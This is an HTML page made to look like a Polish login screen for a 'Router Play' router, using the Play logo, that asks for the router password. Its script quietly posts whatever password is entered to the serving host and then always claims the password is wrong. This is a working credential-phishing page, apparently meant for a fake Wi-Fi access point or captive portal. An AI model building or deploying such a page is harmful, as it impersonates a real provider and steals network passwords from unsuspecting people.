<!DOCTYPE html>
<html lang="pl">
<head>
  <meta charset="UTF-8">
  <title>Logowanie - Router Play</title>
  <style>
    body {
      margin: 0;
      font-family: 'Segoe UI', sans-serif;
      background-color: #59309b;
    }

    .logo {
      position: absolute;
      top: 10px;
      left: 10px;
    }

    .logo img {
      height: 30px;
    }

    .container {
      background-color: #ede7f6;
      width: 50%;
      max-width: 600px;
      margin: 80px auto;
      padding: 50px 20px;
      text-align: center;
      border-radius: 5px;
    }

    h1 {
      color: #7b4eb6;
      font-size: 36px;
      margin-bottom: 10px;
    }

    p {
      color: #333;
      font-size: 18px;
      margin-bottom: 30px;
    }

    label {
      display: block;
      font-size: 16px;
      margin-bottom: 5px;
    }

    input[type="password"] {
      padding: 8px 12px;
      font-size: 16px;
      width: 200px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }

    .input-group {
        display: flex;
        align-items: center;
        justify-content: center;
        gap: 10px; /* odstęp między label a inputem */
    }       

    .input-group label {
    font-size: 16px;
    white-space: nowrap;
    }


    button {
      margin-top: 20px;
      padding: 10px 20px;
      background-color: #7b4eb6;
      color: white;
      font-size: 16px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <div class="logo">
    <img src="img/play_logo.png">
  </div>

  <div class="container">
    <h1>Dzień dobry</h1>
    <p>Zaloguj się, aby uzyskać dostęp do ustawień routera.</p>
    
    <form id="loginForm">
  <div class="input-group">
    <label for="password">Hasło</label>
    <input type="password" id="password" name="password" required>
  </div>
  <br>
  <button type="submit">Zaloguj się</button>
</form>

  </div>

  <script>
  document.getElementById('loginForm').addEventListener('submit', async function (e) {
    e.preventDefault();
    const password = document.getElementById('password').value;

    await fetch('', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ password })
    });

    alert("Podane hasło jest błędne.");
  });
</script>

</body>
</html>
